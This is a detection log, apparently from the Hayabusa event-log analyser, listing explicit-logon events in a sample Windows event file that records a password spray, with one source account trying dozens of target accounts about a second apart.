DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:41.637 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:42.734 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:43.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:44.875 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:45.951 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:47.017 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:48.096 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:49.176 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:50.264 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:51.340 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:52.405 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:53.466 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:54.572 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:55.671 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:56.741 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:57.817 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:58.894 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:59.965 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:01.026 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:02.115 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:03.191 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:04.272 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:05.348 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:06.426 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:07.478 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:08.564 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:09.668 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:10.717 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:11.809 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : 